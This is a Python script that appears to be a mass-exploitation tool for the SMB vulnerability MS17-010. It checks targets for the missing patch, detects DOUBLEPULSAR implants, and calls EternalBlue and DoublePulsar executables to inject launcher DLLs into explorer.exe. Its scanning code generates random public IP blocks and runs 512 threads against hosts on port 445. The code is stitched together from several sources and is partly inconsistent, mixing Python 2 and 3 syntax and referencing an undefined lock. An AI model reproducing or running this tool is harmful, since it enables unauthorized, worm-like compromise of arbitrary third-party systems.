  1. from impacket import smb, ntlm, smbconnection, nt_errors
  2. from impacket.uuid import uuidtup_to_bin
  3. import socket
  4. from mysmb import MYSMB
  5. from impacket import smb
  6. from struct import pack, unpack
  7. import socket
  8. import time
  9. import threading
  10. import random
  11. import binascii
  12. import itertools
  13. import os
  14.  
  15. '''
  16. Script for
  17. - check target if MS17-010 is patched or not.
  18. - find accessible named pipe
  19. '''
  20. USERNAME = ''
  21. PASSWORD = ''
  22.  
  23. NDR64Syntax = ('71710533-BEBA-4937-8319-B5DBEF9CCC36', '1.0')
  24.  
  25. MSRPC_UUID_BROWSER = uuidtup_to_bin(('6BFFD098-A112-3610-9833-012892020162','0.0'))
  26. MSRPC_UUID_SPOOLSS = uuidtup_to_bin(('12345678-1234-ABCD-EF00-0123456789AB','1.0'))
  27. MSRPC_UUID_NETLOGON = uuidtup_to_bin(('12345678-1234-ABCD-EF00-01234567CFFB','1.0'))
  28. MSRPC_UUID_LSARPC = uuidtup_to_bin(('12345778-1234-ABCD-EF00-0123456789AB','0.0'))
  29. MSRPC_UUID_SAMR = uuidtup_to_bin(('12345778-1234-ABCD-EF00-0123456789AC','1.0'))
  30.  
  31. pipes = {
  32. 'browser' : MSRPC_UUID_BROWSER,
  33. 'spoolss' : MSRPC_UUID_SPOOLSS,
  34. 'netlogon' : MSRPC_UUID_NETLOGON,
  35. 'lsarpc' : MSRPC_UUID_LSARPC,
  36. 'samr' : MSRPC_UUID_SAMR,
  37. }
  38.  
  39. def check(target):
  40. conn = MYSMB(target)
  41. try:
  42. conn.login(USERNAME, PASSWORD)
  43. except smb.SessionError as e:
  44. print('[-] Login failed: ' + nt_errors.ERROR_MESSAGES[e.error_code][0])
  45. return False
  46. finally:
  47. print('[.] Target OS: ' + conn.get_server_os())
  48.  
  49. tid = conn.tree_connect_andx('\\\\'+target+'\\'+'IPC$')
  50. conn.set_default_tid(tid)
  51.  
  52.  
  53. # test if target is vulnerable
  54. TRANS_PEEK_NMPIPE = 0x23
  55. recvPkt = conn.send_trans(pack('<H', TRANS_PEEK_NMPIPE), maxParameterCount=0xffff, maxDataCount=0x800)
  56. status = recvPkt.getNTStatus()
  57. if status == 0xC0000205: # STATUS_INSUFF_SERVER_RESOURCES
  58. print('[+] The target is not patched!')
  59. return True
  60. else:
  61. print('[-] The target is patched.')
  62.  
  63. # Packets
  64. negotiate_protocol_request = binascii.unhexlify("00000085ff534d4272000000001853c00000000000000000000000000000fffe00004000006200025043204e4554574f524b2050524f4752414d20312e3000024c414e4d414e312e30000257696e646f777320666f7220576f726b67726f75707320332e316100024c4d312e325830303200024c414e4d414e322e3100024e54204c4d20302e313200")
  65. session_setup_request = binascii.unhexlify("00000088ff534d4273000000001807c00000000000000000000000000000fffe000040000dff00880004110a000000000000000100000000000000d40000004b000000000000570069006e0064006f007700730020003200300030003000200032003100390035000000570069006e0064006f007700730020003200300030003000200035002e0030000000")
  66. tree_connect_request = binascii.unhexlify("00000060ff534d4275000000001807c00000000000000000000000000000fffe0008400004ff006000080001003500005c005c003100390032002e003100360038002e003100370035002e003100320038005c00490050004300240000003f3f3f3f3f00")
  67. trans2_session_setup = binascii.unhexlify("0000004eff534d4232000000001807c00000000000000000000000000008fffe000841000f0c0000000100000000000000a6d9a40000000c00420000004e0001000e000d0000000000000000000000000000")
  68.  
  69. def calculate_doublepulsar_xor_key(s):
  70. x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))
  71. x = x & 0xffffffff # this line was added just to truncate to 32 bits
  72. return x
  73.  
  74.  
  75. # The arch is adjacent to the XOR key in the SMB signature
  76. def calculate_doublepulsar_arch(s):
  77. if s & 0xffffffff00000000 == 0:
  78. return "x86 (32-bit)"
  79. else:
  80. return "x64 (64-bit)"
  81.  
  82.  
  83. def print_status(ip, message):
  84. global print_lock
  85.  
  86. with print_lock:
  87. print "[*] [%s] %s" % (ip, message)
  88.  
  89.  
  90. def check_ip(ip):
  91. global negotiate_protocol_request, session_setup_request, tree_connect_request, trans2_session_setup, timeout, verbose
  92.  
  93. # Connect to socket
  94. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  95. s.settimeout(5)
  96. host = ip
  97. port = 445
  98. s.connect((host, port))
  99.  
  100. # Send/receive negotiate protocol request
  101. s.send(negotiate_protocol_request)
  102. s.recv(1024)
  103.  
  104. # Send/receive session setup request
  105. s.send(session_setup_request)
  106. session_setup_response = s.recv(1024)
  107.  
  108. # Extract user ID from session setup response
  109. user_id = session_setup_response[32:34]
  110.  
  111. # Replace user ID in tree connect request packet
  112. modified_tree_connect_request = list(tree_connect_request)
  113. modified_tree_connect_request[32] = user_id[0]
  114. modified_tree_connect_request[33] = user_id[1]
  115. modified_tree_connect_request = "".join(modified_tree_connect_request)
  116.  
  117. # Send tree connect request
  118. s.send(modified_tree_connect_request)
  119. tree_connect_response = s.recv(1024)
  120.  
  121. # Extract tree ID from response
  122. tree_id = tree_connect_response[28:30]
  123. # Replace tree ID and user ID in trans2 session setup packet
  124. modified_trans2_session_setup = list(trans2_session_setup)
  125. modified_trans2_session_setup[28] = tree_id[0]
  126. modified_trans2_session_setup[29] = tree_id[1]
  127. modified_trans2_session_setup[32] = user_id[0]
  128. modified_trans2_session_setup[33] = user_id[1]
  129. modified_trans2_session_setup = "".join(modified_trans2_session_setup)
  130. s.send(modified_trans2_session_setup)
  131. final_response = s.recv(1024)
  132. s.close()
  133. # Check for 0x51 response to indicate DOUBLEPULSAR infection
  134. if final_response[34] == "\x51":
  135. signature = final_response[18:26]
  136. signature_long = unpack('<Q', signature)[0]
  137. key = calculate_doublepulsar_xor_key(signature_long)
  138. arch = calculate_doublepulsar_arch(signature_long)
  139. print "[+] [%s] DOUBLEPULSAR SMB IMPLANT DETECTED!!! Arch: %s, XOR Key: %s" % (ip, arch, hex(key))
  140. return arch
  141. else:
  142. return False
  143.  
  144. def exploit(IP):
  145. print os.popen("Eternalblue-2.2.0.exe --TargetIp " + IP).read()
  146. arch = check_ip(IP)
  147. if arch == "x86 (32-bit)":
  148. print os.popen("Doublepulsar-1.3.1.exe --TargetIp " + IP + " --Function RunDll --DllPayload launcher.x86.dll --ProcessName explorer.exe").read()
  149. elif arch == "x64 (64-bit)":
  150. print os.popen("Doublepulsar-1.3.1.exe --TargetIp " + IP + " --Function RunDll --DllPayload launcher.x64.dll --ProcessName explorer.exe").read()
  151.  
  152. def gen_IP_block():
  153. not_valid = [10,127,169,172,192]
  154. first = random.randrange(1,256)
  155. while first in not_valid:
  156. first = random.randrange(1,256)
  157. ip = ".".join([str(first),str(random.randrange(1,256)),
  158. str(random.randrange(1,256))])
  159. return ip+".1-255"
  160.  
  161. def ip_range(input_string):
  162. octets = input_string.split('.')
  163. chunks = [map(int, octet.split('-')) for octet in octets]
  164. ranges = [range(c[0], c[1] + 1) if len(c) == 2 else c for c in chunks]
  165.  
  166. for address in itertools.product(*ranges):
  167. yield '.'.join(map(str, address))
  168.  
  169. def Scan(IP):
  170. try:
  171. s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  172. s.settimeout(0.50)
  173. s.connect((IP, 445))
  174. s.close()
  175. if check(IP):
  176. exploit(IP)
  177. except Exception as e:
  178. pass
  179.  
  180. def HaxThread():
  181. while 1:
  182. for IP in ip_range(gen_IP_block()):
  183. Scan(IP)
  184.  
  185.  
  186. def checklist(chunk):
  187. # for ipblock in chunk:
  188. # for host in ip_range(ipblock):
  189. for host in chunk:
  190. Scan(host)
  191.  
  192. threads = 512
  193.  
  194. lines = open("smb.txt","r").read().split("\n")
  195. random.shuffle(lines)
  196.  
  197. def chunkify(lst,n):
  198. return [ lst[i::n] for i in xrange(n) ]
  199.  
  200. chunks = chunkify(lines, threads) # make seperate chunk for each thread
  201.  
  202. for thread in xrange(0,threads):
  203. if thread >= 384:
  204. time.sleep(0.2)
  205. try:
  206. threading.Thread(target = checklist, args = (chunks[thread],)).start()
  207. except:
  208. pass
  209. print "Scanning... Press enter 3 times to stop."
  210.  
  211. for i in range(0,3):
  212. raw_input()
  213.  
  214. os.popen("taskkill /f /pid " + str(os.getpid()))
  215. """
  216. hosts=''''''.split("\n")
  217. random.shuffle(hosts)
  218. for IP in hosts:
  219. try:
  220. threading.Thread(target=Scan, args=(IP,)).start()
  221. except:
  222. time.sleep(10)
  223. try:
  224. threading.Thread(target=Scan, args=(IP,)).start()
  225. except:
  226. pass
  227. pass
  228. """